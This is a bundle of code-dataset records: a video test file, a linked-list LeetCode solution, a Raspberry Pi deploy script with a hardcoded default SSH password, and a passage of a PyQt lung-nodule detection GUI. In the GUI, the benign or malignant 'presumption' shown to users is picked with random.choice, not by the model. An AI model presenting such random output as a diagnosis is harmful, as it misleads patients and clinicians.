test_has_advertisement_defaults_to_true(self):\n # For bw-compat to videos imported before we recognized the field.\n factory = zeit.content.video.testing.video_factory(self)\n video = factory.next()\n self.assertEqual(True, video.has_advertisement)\n\n\n@pytest.mark.parametrize(\n 'title,supertitle,result', [\n (u'Äch bön oin Börlünär.', u'Kennedy said:',\n u'kennedy-said-aech-boen-oin-boerluenaer'),\n (None, u'Kennedy said:', u'kennedy-said'),\n (u'Äch bön oin Börlünär.', None, u'aech-boen-oin-boerluenaer')])\ndef test_seo_slug_returns_url_normalized_version_of_title_and_supertitle(\n title, supertitle, result):\n video = zeit.content.video.video.Video()\n video.title = title\n video.supertitle = supertitle\n assert result == video.seo_slug\n\n\nclass TestReference(zeit.content.video.testing.TestCase):\n\n def setUp(self):\n super(TestReference, self).setUp()\n self.node = lxml.objectify.XML(\n '')\n\n def create_video(self, **kw):\n factory = zeit.content.video.testing.video_factory(self)\n factory.next()\n factory.next() # video is now in repository['video']\n player = zope.component.getUtility(\n zeit.content.video.interfaces.IPlayer)\n player.get_video.return_value.update(kw)\n\n def update(self, node):\n updater = zeit.cms.content.interfaces.IXMLReferenceUpdater(\n self.repository['video'])\n updater.update(node)\n\n def test_still_should_be_contained_in_xml_reference(self):\n self.create_video(video_still='http://stillurl')\n self.update(self.node)\n self.assertEqual(\n 'http://stillurl', self.node['video-still'].get('src'))\n\n def test_thumbnail_should_be_contained_in_xml_reference(self):\n self.create_video(thumbnail='http://thumbnailurl')\n self.update(self.node)\n self.assertEqual(\n 'http://thumbnailurl', self.node['thumbnail'].get('src'))\n\n def test_nodes_should_be_removed_from_reference(self):\n self.create_video(\n video_still='http://stillurl', thumbnail='http://thumbnailurl')\n self.update(self.node)\n self.create_video(video_still=None, thumbnail=None)\n self.update(self.node)\n self.assertRaises(AttributeError, lambda: self.node['video-still'])\n self.assertRaises(AttributeError, lambda: self.node['thumbnail'])\n\n\nclass TestAuthorshipsProperty(zeit.content.video.testing.TestCase):\n\n def test_authorships_property_converts_IAuthor_to_IReference(\n self):\n from zeit.cms.content.interfaces import IReference\n from zeit.content.author.author import Author\n from zeit.content.video.video import Video\n self.repository['author'] = Author()\n video = Video()\n video.authorships = (self.repository['author'],)\n self.assertEqual(\n [True], [IReference.providedBy(x) for x in video.authorships])\n self.assertEqual(\n [self.repository['author']], [x.target for x in video.authorships])\n\n def test_authorships_property_passes_IReference_without_conversion(self):\n from zeit.cms.content.interfaces import IReference\n from zeit.content.author.author import Author\n from zeit.content.video.video import Video\n self.repository['author'] = Author()\n video = Video()\n video.authorships = (\n video.authorships.create(self.repository['author']),)\n self.assertEqual(\n [True], [IReference.providedBy(x) for x in video.authorships])\n self.assertEqual(\n [self.repository['author']], [x.target for x in video.authorships])\n","sub_path":"src/zeit/content/video/tests/test_video.py","file_name":"test_video.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523360482","text":"# 给你单链表的头指针 head 和两个整数 left 和 right ,其中 left <= right 。请你反转从位置 left 到位置 right 的链\r\n# 表节点,返回 反转后的链表 。\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n# 输入:head = [1,2,3,4,5], left = 2, right = 4\r\n# 输出:[1,4,3,2,5]\r\n#\r\n#\r\n# 示例 2:\r\n#\r\n#\r\n# 输入:head = [5], left = 1, right = 1\r\n# 输出:[5]\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# 链表中节点数目为 n\r\n# 1 <= n <= 500\r\n# -500 <= Node.val <= 500\r\n# 1 <= left <= right <= n\r\n#\r\n#\r\n#\r\n#\r\n# 进阶: 你可以使用一趟扫描完成反转吗?\r\n# Related Topics 链表\r\n# 👍 955 👎 0\r\n\r\nfrom typing import List\r\n# Definition for singly-linked list.\r\nclass ListNode:\r\n def __init__(self, val=0, next=None):\r\n self.val = val\r\n self.next = next\r\n\r\n def generate(self, vals: List):\r\n if not vals:\r\n return None\r\n head = ListNode(vals[0])\r\n cur = head\r\n for i in range(1, len(vals)):\r\n cur.next = ListNode(vals[i])\r\n cur = cur.next\r\n cur.next = None\r\n return head\r\n\r\n# leetcode submit region begin(Prohibit modification and deletion)\r\nclass Solution:\r\n def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\r\n dummy = ListNode(0)\r\n dummy.next = head\r\n count = 1\r\n pre = dummy\r\n if not head or not head.next: # 如果链表非空或只有一个元素,则直接返回head\r\n return head\r\n while count < left: # 找到left位置的前一个元素\r\n pre = pre.next\r\n count += 1\r\n cur = pre.next # cur表示需要反转的元素\r\n tail = pre # 将tail指针固定在left前一位置\r\n while cur.next and count < right: # 遍历left至right之间的元素,利用头插法进行反转\r\n nxt = cur.next # 储存cur的下一节点\r\n cur.next = nxt.next\r\n nxt.next = tail.next\r\n tail.next = nxt\r\n count += 1\r\n return dummy.next\r\n# leetcode submit region end(Prohibit modification and deletion)\r\n\r\nsolution = Solution()\r\nlistnode = ListNode()\r\nl1 = listnode.generate([1,2,3,4,5])\r\nk = solution.reverseBetween(l1,2,4)\r\nwhile k:\r\n print(k.val)\r\n k = k.next\r\n\r\n","sub_path":"[92]反转链表2.py","file_name":"[92]反转链表2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615858596","text":"from paramiko import SSHClient, AutoAddPolicy\nfrom scp import SCPClient\nimport argparse\nimport time\n\nfiles = [\"magic_numbers.py\", \"connection.py\", \"camera_manager.py\", \"utilities\"]\n\nparser = argparse.ArgumentParser(\n \"Upload code to the Pi. Only one option (power-port or loading-bay) can be used. IP defaults to 10.47.74.11\"\n)\nparser.add_argument(\n \"-lb\", \"--loading-bay\", help=\"Upload loading bay code\", action=\"store_true\"\n)\nparser.add_argument(\n \"-pp\", \"--power-port\", help=\"Upload power port code\", action=\"store_true\"\n)\nparser.add_argument(\"-i\", \"--initial\", help=\"Set pi to use Python\", action=\"store_true\")\nparser.add_argument(\"-ip\", \"--ip\", help=\"Specify a custom ip\")\nargs = parser.parse_args()\n\n\nif args.loading_bay and args.power_port:\n print(parser.print_help())\n quit()\n\nelif args.loading_bay:\n main_file = \"loading_bay_vision.py\"\n print(\"Deploying Loading Bay code\")\n\nelif args.power_port:\n main_file = \"power_port_vision.py\"\n print(\"Deploying Power Port code\")\n\nelse:\n parser.print_help()\n quit()\n\nserver_ip = \"10.47.74.11\" if args.ip is None else args.ip\nusername = \"pi\"\npassword = \"raspberry\"\n\nssh = SSHClient()\nssh.set_missing_host_key_policy(AutoAddPolicy())\nprint(f\"Connecting to the pi at {server_ip} ... \", end=\"\")\nssh.connect(server_ip, username=username, password=password)\nprint(\"Done\")\n\nprint(\"Turning off vision ... \", end=\"\")\nssh.exec_command(\"sudo svc -d /service/camera\")\nprint(\"Done\")\n\nprint(\"Making file system writable ... \", end=\"\")\nstdout, stdin, stderr = ssh.exec_command(\n \"sudo mount -o remount,rw / ; sudo mount -o remount,rw /boot\"\n)\nfor line in stderr:\n print(line)\nexit_status = stdout.channel.recv_exit_status()\nif exit_status != 0:\n print(f\"Something's gone wrong! Error exit status: {exit_status}\")\n quit()\nelse:\n print(\"Done\")\n\nprint(\"Uploading files ... \", end=\"\")\nscp = SCPClient(ssh.get_transport())\nif args.initial:\n scp.put(\"runCamera\")\n ssh.exec_command(\"chmod 755 runCamera\")\nscp.put(files, recursive=True)\nscp.put(main_file, remote_path=\"~/uploaded.py\")\nprint(\"Done\")\n\nprint(\"Making file system read-only ... \", end=\"\")\nssh.exec_command(\"sudo mount -o remount,ro / ; sudo mount -o remount,ro /boot\")\nprint(\"Done\")\n\nprint(\"Turning on vision ... \", end=\"\")\nssh.exec_command(\"sudo svc -u /service/camera\")\nprint(\"Done\")\n\nscp.close()","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453101276","text":"# cocoding: utf-8\n# Team : JiaLiDun University\n# Author:zl\n# Date :2021/3/30 0030 下午 3:23\n# Tool :PyCharm\nimport sys\nfrom ui import Ui_Form\nfrom PyQt5.QtCore import Qt, QThread, pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QGraphicsScene, QGraphicsTextItem, QMessageBox, QGraphicsPixmapItem, \\\n QApplication,QFileDialog,QDialog,QGraphicsView\nfrom PyQt5.QtGui import QIcon, QFont, QDragEnterEvent, QImage, QResizeEvent, QPixmap, QCloseEvent,QMouseEvent\nimport re, os, cv2\nimport numpy as np\nimport configparser\nimport prediction\nimport shutil\nimport random\n\n\nfiletype='*.png *.jpg' #定义接受的图片类型\n\ndef clean_dir(path): #清除path目录下的所有文件,用于清空临时目录\n \"\"\"\n 删除某一目录下的所有文件或文件夹\n :param filepath: 路径\n :return:\n \"\"\"\n del_list = os.listdir(path)\n for f in del_list:\n file_path = os.path.join(path, f)\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path) #清除pa #清除path目录下的\n\nclass MyBatchDoThread(QThread): #继承qthread类,重写run方法,使用线程处理目录中的所有文件,防止界面卡死\n rightSignal = pyqtSignal(str)\n wrongSignal = pyqtSignal(str)\n infoSignal=pyqtSignal(str)\n workdir=pyqtSignal(str)\n\n CHANNEL_COUNT = pyqtSignal(int)\n _3DCNN_WEIGHTS = pyqtSignal(str)\n UNET_WEIGHTS = pyqtSignal(str)\n THRESHOLD = pyqtSignal(int)\n BATCH_SIZE = pyqtSignal(int)\n temp_dir = pyqtSignal(str)\n\n\n def __init__(self,parent=None):\n super(MyBatchDoThread,self).__init__()\n\n def __del__(self):\n print('del')\n try:\n self.destroyed()\n except Exception as e:\n print(e)\n\n def run(self):\n \n prediction.CHANNEL_COUNT = self.CHANNEL_COUNT\n prediction._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n prediction.UNET_WEIGHTS = self.UNET_WEIGHTS\n prediction.THRESHOLD = self.THRESHOLD\n prediction.BATCH_SIZE = self.BATCH_SIZE\n prediction.temp_dir = self.temp_dir\n\n self.normalDir = os.path.join(self.workdir, 'normal')\n self.noticeDir = os.path.join(self.workdir, 'notice')\n\n if not os.path.exists(self.normalDir):\n os.makedirs(self.normalDir)\n if not os.path.exists(self.noticeDir):\n os.makedirs(self.noticeDir)\n\n if not os.listdir(self.normalDir)==[]:\n clean_dir(self.normalDir)\n\n if not os.listdir(self.noticeDir)==[]:\n clean_dir(self.noticeDir)\n\n self.infoSignal.emit('开始批处理,工作目录为:{}'.format(self.workdir))\n\n if os.path.isdir(self.workdir):\n\n for f in os.listdir(self.workdir):\n filename,ext=os.path.splitext(f)\n if ext=='':\n continue\n if ext not in filetype:\n continue\n\n file=os.path.join(self.workdir,f)\n workfile=os.path.join(self.temp_dir,f)\n prediction.temp_file1=os.path.join(self.temp_dir,filename+'-temp1'+ext)\n temp_file2=os.path.join(self.temp_dir,filename+'-result'+ext)\n \n img = cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n h, w, tunnel = img.shape\n if h != w or h != 320 or w != 320:\n img = cv2.resize(img, (320, 320))\n #cv2.imwrite(workfile, img)\n cv2.imencode('.png', img)[1].tofile(workfile)\n else:\n shutil.copy(file,workfile)\n\n print(prediction.temp_file1)\n\n print(os.path.abspath(prediction.UNET_WEIGHTS))\n prediction.unet_predict(workfile)\n centers = prediction.unet_candidate_dicom(prediction.temp_file1)\n\n print('y, x', centers)\n if len(centers) > 0:\n imgSource = cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n # cv2.IMREAD_COLOR:默认参数,读入一副彩色图片,忽略alpha通道\n # cv2.IMREAD_GRAYSCALE:读入灰度图片\n # cv2.IMREAD_UNCHANGED:顾名思义,读入完整图片,包括alpha通道\n imgTarget=img.copy()\n for pos in centers:\n y, x = pos\n cv2.circle(imgTarget, center=(x, y), radius=8, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n \n res = np.hstack([imgSource, imgTarget])\n #cv2.imwrite(temp_file2, res)\n cv2.imencode('.png', res)[1].tofile(temp_file2)\n\n shutil.move(file,self.noticeDir)\n shutil.move(temp_file2,self.noticeDir)\n self.wrongSignal.emit('注意:'+file)\n if len(centers) == 0:\n shutil.move(file,self.normalDir)\n self.rightSignal.emit('正常:'+file)\n self.infoSignal.emit('处理完成') #\n\nclass MySingleDoThread(QThread): ##继承qthread类,重写run方法,使用线程处理单个文件,防止界面卡死\n\n rightSignal = pyqtSignal(str)\n wrongSignal = pyqtSignal(str)\n\n CHANNEL_COUNT = pyqtSignal(int)\n _3DCNN_WEIGHTS = pyqtSignal(str)\n UNET_WEIGHTS = pyqtSignal(str)\n THRESHOLD = pyqtSignal(int)\n BATCH_SIZE = pyqtSignal(int)\n temp_dir = pyqtSignal(str)\n temp_file1 = pyqtSignal(str)\n temp_file2 = pyqtSignal(str)\n source = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(MySingleDoThread, self).__init__()\n\n def run(self):\n prediction.CHANNEL_COUNT = self.CHANNEL_COUNT\n prediction._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n prediction.UNET_WEIGHTS = self.UNET_WEIGHTS\n prediction.THRESHOLD = self.THRESHOLD\n prediction.BATCH_SIZE = self.BATCH_SIZE\n prediction.temp_dir = self.temp_dir\n prediction.temp_file1 = self.temp_file1\n prediction.temp_file2 = self.temp_file2\n # # self.stopSignal=False\n\n\n img = cv2.imdecode(np.fromfile(self.source, dtype=np.uint8), cv2.IMREAD_COLOR)\n\n h, w, tunnel = img.shape\n\n if h != w or h != 320 or w != 320:\n img = cv2.resize(img, (320, 320))\n print(img.shape)\n #cv2.imwrite(self.source, img)\n cv2.imencode('.png', img)[1].tofile(self.source)\n\n prediction.unet_predict(self.source)\n centers = prediction.unet_candidate_dicom(self.temp_file1)\n\n print('y, x', centers)\n if len(centers) > 0:\n img = cv2.imdecode(np.fromfile(self.source, dtype=np.uint8), cv2.IMREAD_COLOR)\n # cv2.IMREAD_COLOR:默认参数,读入一副彩色图片,忽略alpha通道\n # cv2.IMREAD_GRAYSCALE:读入灰度图片\n # cv2.IMREAD_UNCHANGED:顾名思义,读入完整图片,包括alpha通道\n for pos in centers:\n y, x = pos\n cv2.circle(img, center=(x, y), radius=8, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n #cv2.imwrite(self.temp_file2, img)\n cv2.imencode('.png', img)[1].tofile(self.temp_file2)\n self.wrongSignal.emit('异常')\n\n if len(centers) == 0:\n self.rightSignal.emit('正常')\n\nclass MyDialog(QDialog): #定义子类,用于显示处理结果图片\n \n def __init__(self):\n super(QDialog,self).__init__()\n self.setWindowFlags(Qt.FramelessWindowHint| Qt.Tool) #去除窗口边框,去除关闭,最大化扥按钮\n self.accept()\n \n def mouseDoubleClickEvent(self, a0: QMouseEvent) -> None: #重写双击事件,双击关闭本对话框\n print('destroy1')\n\n self.destroy()\n self.close()\n \n def mousePressEvent(self, a0: QMouseEvent) -> None: #重写单击事件,单击关闭本对话框\n print('destroy1')\n self.destroy()\n self.close()\n\n \n def releaseMouse(self) -> None:\n pass\n\nclass App(QWidget, Ui_Form):\n def __init__(self):\n super(App, self).__init__()\n self.setupUi(self)\n self.setWindowTitle(\"肺结节检测\")\n self.setWindowIcon(QIcon('./model/ico.ico'))\n self.toSingleOutput(content='程序初始化中...')\n self.input_view.setAcceptDrops(True)\n\n self.setWindowFlags(Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint)\n self.setFixedSize(self.width(), self.height())\n\n self.workfile = ''\n self.batch_dir=os.path.abspath('./batchdir')\n if not os.path.exists(self.batch_dir):\n os.makedirs(self.batch_dir)\n self.batchDirLineEdit.setText(self.batch_dir)\n self.font = QFont()\n self.font.setPixelSize(100)\n self.fileType = filetype\n self.toSingleOutput(content='初始化完成,请打开或直接拖入图像...,目前只接受{}文件'.format(self.fileType))\n self.toBatchOutput(strings='初始化完成')\n self.toBatchOutput(strings='选择文件夹,点击开始批量处理')\n self.toBatchOutput(strings='请储存好原始影像文件,处理过程可能会造成影像文件被修改')\n self.toBatchOutput(strings='注意请备份normal、notice下的所有文件,执行过程会清空原有文件')\n self.colorThemes = {\n '杏仁黄': (250, 249, 222),\n '秋叶褐': (255, 242, 226),\n '极光灰': (234, 234, 239),\n '青草绿': (227, 237, 205),\n '海天蓝': (220, 226, 241),\n '葛巾紫': (233, 235, 254),\n }\n\n self.OpacitySlider.valueChanged.connect(self.changePactiy)\n self.normalTextEdit.clicked.connect(self.checkItem)\n self.noticeTextEdit.clicked.connect(self.checkItem)\n \n\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3, self.radioButton_4, self.radioButton_5,\n self.radioButton_6]:\n i.clicked.connect(self.setColorTheme)\n\n self.loadConfig()\n self.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n print(self.colorTheme, \"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n\n def mousePressEvent(self, event) -> None:\n try:\n self.popWindow.destroy()\n print(event)\n except Exception as e:\n print(e)\n\n def changePactiy(self, value):\n self.setWindowOpacity(value / 100)\n\n def loadConfig(self): #读取配置文件,根据配置文件中的配置设置透明度,颜色,程序各种参数\n\n path = './config.ini'\n config = configparser.ConfigParser()\n if os.path.exists(path):\n try:\n config.read(path, encoding='gbk')\n except configparser.MissingSectionHeaderError as e:\n self.toSingleOutput(message='配置文件无任何section,请检查配置文件')\n sys.exit(1)\n except Exception as e:\n self.toSingleOutput(message=str(e))\n sys.exit(1)\n else:\n self.toSingleOutput('未找到配置文件')\n sys.exit(1)\n\n self.CHANNEL_COUNT = int(config.get('config', 'CHANNEL_COUNT'))\n self._3DCNN_WEIGHTS = str(config.get('config', '_3DCNN_WEIGHTS'))\n self.UNET_WEIGHTS = str(config.get('config', 'UNET_WEIGHTS'))\n self.THRESHOLD = int(config.get('config', 'THRESHOLD'))\n self.BATCH_SIZE = int(config.get('config', 'BATCH_SIZE'))\n self.temp_dir = str(config.get('config', 'temp_dir'))\n\n self.Opacity = int(config.get('config', 'Opacity'))\n self.colorTheme = str(config.get('config', 'colorTheme'))\n\n self.temp_file1 = os.path.join(self.temp_dir, '1.png')\n self.temp_file2 = os.path.join(self.temp_dir, '2.png')\n\n self.cHANNEL_COUNTLineEdit.setText(str(self.CHANNEL_COUNT))\n self._3DCNN_WEIGHTSLineEdit.setText(str(self._3DCNN_WEIGHTS))\n self.uNET_WEIGHTSLineEdit.setText(str(self.UNET_WEIGHTS))\n self.tHRESHOLDLineEdit.setText(str(self.THRESHOLD))\n self.bATCH_SIZELineEdit.setText(str(self.BATCH_SIZE))\n self.temp_dirLineEdit.setText(str(self.temp_dir))\n\n print(self.colorTheme, self.colorThemes)\n\n self.OpacitySlider.setValue(self.Opacity)\n self.setWindowOpacity(self.Opacity / 100)\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3, self.radioButton_4, self.radioButton_5,\n self.radioButton_6]:\n if i.text() == self.colorTheme:\n i.setChecked(True)\n self.toSingleOutput('配置文件已加载')\n\n def setColorTheme(self): #设置界面颜色\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3,\n self.radioButton_4, self.radioButton_5, self.radioButton_6]:\n if i.isChecked():\n print(i)\n self.colorTheme = i.text()\n print(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n self.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n\n def saveConfig(self): #储存配置\n path = './config.ini'\n config = configparser.ConfigParser()\n config.add_section('config')\n config.set('config', 'CHANNEL_COUNT', self.cHANNEL_COUNTLineEdit.text())\n config.set('config', '_3DCNN_WEIGHTS', self._3DCNN_WEIGHTSLineEdit.text())\n config.set('config', 'UNET_WEIGHTS', self.uNET_WEIGHTSLineEdit.text())\n config.set('config', 'THRESHOLD', self.tHRESHOLDLineEdit.text())\n config.set('config', 'BATCH_SIZE', self.bATCH_SIZELineEdit.text())\n config.set('config', 'temp_dir', self.temp_dirLineEdit.text())\n config.set('config', 'Opacity', str(self.OpacitySlider.value()))\n config.set('config', 'colorTheme', self.colorTheme)\n\n if QMessageBox.question(self, '保存', '是否保存配置', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) == QMessageBox.Yes:\n with open(path, 'w+', encoding='gbk') as f:\n config.write(f)\n\n @pyqtSlot() #将储存配置按钮和储存配置方法绑定\n def on_saveConfigButton_clicked(self):\n self.saveConfig()\n\n @pyqtSlot()\n def on_button_clicked(self):\n a = self.v_view.size()\n self.button.setText(str(a))\n\n def name2Wegite(self, name): #根据控件名返回控件对象\n if name:\n return self.findChild(QWidget, name)\n else:\n print('name is empty')\n\n def isMatchFileType(self, s): #判断拖入窗体的文件是否为filetype定义的类型\n file, ext = os.path.splitext(s)\n # print(file,ext,[str.lower(x) for x in re.split( ' ', self.fileType)])\n if str.lower(ext) in [str.lower(x.replace('*', '')) for x in re.split(' ', self.fileType)]:\n return True\n else:\n return False\n\n def dragEnterEvent(self, e: QDragEnterEvent): #接受,或拒绝拖入窗体的文件\n if self.Pages.currentIndex() != 0:\n e.ignore()\n return\n\n if e.mimeData().hasText():\n txt = e.mimeData().text()\n print(txt)\n if self.isMatchFileType(txt):\n print('accept')\n e.accept()\n\n def dropEvent(self, e): #处理拖入窗体的文件\n print('drop')\n txt = e.mimeData().text()\n txt = re.sub('file:[/]+', '', txt)\n abspath = os.path.abspath(txt)\n path, file = os.path.split(abspath)\n filename, ext = os.path.splitext(file)\n self.workfile = os.path.join(self.temp_dir, file)\n self.temp_file1 = os.path.join(self.temp_dir, filename + '-temp1' + ext)\n self.temp_file2 = os.path.join(self.temp_dir, filename + '-temp2' + ext)\n shutil.copy(abspath, self.workfile)\n self.lineEdit.setText(abspath)\n self.lineEdit.setDisabled(True)\n self.do()\n self.toSingleOutput(content='检测到文件输入:{},处理'.format(abspath))\n\n @pyqtSlot()\n def on_openButton_clicked(self): #定义并绑定打开按钮的方法\n file, type = QFileDialog.getOpenFileName(None, caption='打开', directory='.', filter=self.fileType)\n if not os.path.isfile(file):\n return\n \n abspath = os.path.abspath(file)\n path, file = os.path.split(abspath)\n filename, ext = os.path.splitext(file)\n self.workfile = os.path.join(self.temp_dir, file)\n self.temp_file1 = os.path.join(self.temp_dir, filename + '-temp1' + ext)\n self.temp_file2 = os.path.join(self.temp_dir, filename + '-temp2' + ext)\n shutil.copy(abspath, self.workfile)\n self.lineEdit.setText(abspath)\n self.lineEdit.setDisabled(True)\n self.do()\n self.toSingleOutput(content='检测到文件输入:{},处理'.format(abspath))\n\n\n\n def do(self): #处理拖入的图片文件,显示在窗口input_view控件中,并调用startPredicte方法开始处理输入图片\n if not os.path.exists(self.temp_dir):\n os.makedirs(self.temp_dir)\n if os.path.isfile(self.workfile):\n try:\n img = cv2.imdecode(np.fromfile(self.workfile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n zoomscale = min(width_scale, height_scale) # 图片放缩尺度\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n self.source_pic_item = QGraphicsPixmapItem(pix) # 创建像素图元\n self.source_pic_item.setScale(zoomscale)\n self.source_scene = QGraphicsScene() # 创建场景\n self.source_scene.addItem(self.source_pic_item)\n self.input_view.setScene(self.source_scene)\n self.input_view.show()\n self.startPredicte()\n except Exception as e:\n print(e)\n\n @pyqtSlot()\n def on_batchSelecthButton_clicked(self): #定义并绑定批处理选择目录按钮的方法\n #\n select=os.path.abspath(QFileDialog.getExistingDirectory(self,'选择批量处理目录',self.batch_dir,QFileDialog.ShowDirsOnly))\n select=os.path.abspath(select)\n print(select)\n if select in [os.path.abspath('.'),os.path.abspath(self.temp_dir)]:\n QMessageBox.warning(self,'注意','不允许将程序根目录或temp目录作为批处理目录')\n return\n else:\n self.batch_dir=select\n self.batchDirLineEdit.setText(self.batch_dir)\n\n @pyqtSlot()\n def on_batchDoButton_clicked(self): #定义并绑定批处理开始批量处理按钮的方法\n if os.path.isdir(self.batch_dir):\n if QMessageBox.question(self,'注意','您选中的文件夹是:‘{}’\\r\\n是否处理该目录影像'.format(self.batch_dir),QMessageBox.Yes|QMessageBox.No,QMessageBox.No)==QMessageBox.Yes:\n self.clearBatchResult()\n self.batchThread=MyBatchDoThread()\n self.batchThread.rightSignal.connect(self.toBatchOutput)\n self.batchThread.wrongSignal.connect(self.toBatchOutput)\n self.batchThread.infoSignal.connect(self.toBatchOutput)\n self.batchThread.finished.connect(self.batchThread.__del__)\n\n\n self.batchThread.CHANNEL_COUNT = int(self.CHANNEL_COUNT)\n self.batchThread._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n self.batchThread.UNET_WEIGHTS = self.UNET_WEIGHTS\n self.batchThread.THRESHOLD = int(self.THRESHOLD)\n self.batchThread.BATCH_SIZE = int(self.BATCH_SIZE)\n self.batchThread.temp_dir = self.temp_dir\n\n self.batchThread.workdir=self.batch_dir\t#normalSignal,warnningSignal\n self.batchThread.start()\n\n\n\n\n def startPredicte(self): #单张图片预测\n self.thread = MySingleDoThread()\n self.thread.rightSignal.connect(self.setNormalResult)\n self.thread.wrongSignal.connect(self.setNoticeResult)\n self.thread.CHANNEL_COUNT = int(self.CHANNEL_COUNT)\n self.thread._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n self.thread.UNET_WEIGHTS = self.UNET_WEIGHTS\n self.thread.THRESHOLD = int(self.THRESHOLD)\n self.thread.BATCH_SIZE = int(self.BATCH_SIZE)\n self.thread.temp_dir = self.temp_dir\n self.thread.temp_file1 = self.temp_file1\n self.thread.temp_file2 = self.temp_file2\n self.thread.source = self.workfile\n self.thread.start()\n\n def setNormalResult(self, a0): #如果结果正常,设置右侧输出的信息\n try:\n print('set normal')\n self.normal_item = QGraphicsTextItem()\n self.normal_item.setPlainText('NORMAL')\n self.normal_item.setDefaultTextColor(Qt.green)\n self.normal_item.setFont(self.font)\n\n self.normalScene = QGraphicsScene()\n self.normalScene.addItem(self.normal_item)\n self.outputView.setScene(self.normalScene)\n self.outputView.show()\n self.outputText.setText('未检查出结节')\n self.toSingleOutput('未检查出结节')\n except Exception as e:\n print(e)\n\n def setNoticeResult(self, a0): #如果结果有异常,设置右侧输出的信息\n self.outputText.setText('')\n img = cv2.imdecode(np.fromfile(self.temp_file2, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n zoomscale = min(width_scale, height_scale) # 图片放缩尺度\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n self.notice_item = QGraphicsPixmapItem(pix) # 创建像素图元\n self.notice_item.setScale(zoomscale)\n self.notice_scene = QGraphicsScene() # 创建场景\n self.notice_scene.addItem(self.notice_item)\n self.outputView.setScene(self.notice_scene)\n self.outputView.show()\n self.outputText.append('检查出结节')\n self.outputText.append('推测为{}'.format(random.choice(['良性', '恶性', '良性'])))\n self.outputText.append('请人工复查')\n\n def resizeEvent(self, a0: QResizeEvent) -> None:\n self.do()\n\n def toSingleOutput(self, content): #设置底部状态栏的结果输出信息\n self.outPut.append('''{}'''.format(content))\n self.outPut.append('')\n \n def toBatchOutput(self, strings): #设置批量处理的结果输出信息\n\n if '正常:' in strings:\n self.normalTextEdit.addItem('{}'.format(os.path.split(strings.replace('正常:',''))[1]))\n\n if '注意:' in strings:\n self.noticeTextEdit.addItem('{}'.format(os.path.split(strings.replace('注意:', ''))[1]))\n \n self.batchOutPut.append('''{}'''.format(strings))\n self.batchOutPut.append('')\n\n def clearBatchResult(self): #清空批量处理的结果信息\n self.normalTextEdit.clear()\n self.noticeTextEdit.clear()\n \n def checkItem(self,index): #点击批量处理结果时,弹出结果图片\n print(index.row(),index.data())\n filename,ext=os.path.splitext(index.data())\n normalfile=os.path.join(self.batch_dir,'normal',filename+ext)\n noticefile=os.path.join(self.batch_dir,'notice',filename+'-result'+ext)\n print(normalfile,os.path.exists(normalfile))\n print(noticefile,os.path.exists(noticefile))\n\n if os.path.exists(normalfile):\n img = cv2.imdecode(np.fromfile(normalfile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n\n elif os.path.exists(noticefile):\n img = cv2.imdecode(np.fromfile(noticefile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n\n else:\n return\n\n zoomscale = 1.5 # min(width_scale, height_scale) # 图片放缩尺度\n\n self.popWindow=MyDialog()\n self.popWindow.resize(int(zoomscale*img_width),int(zoomscale*img_height))\n self.popWindow.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n 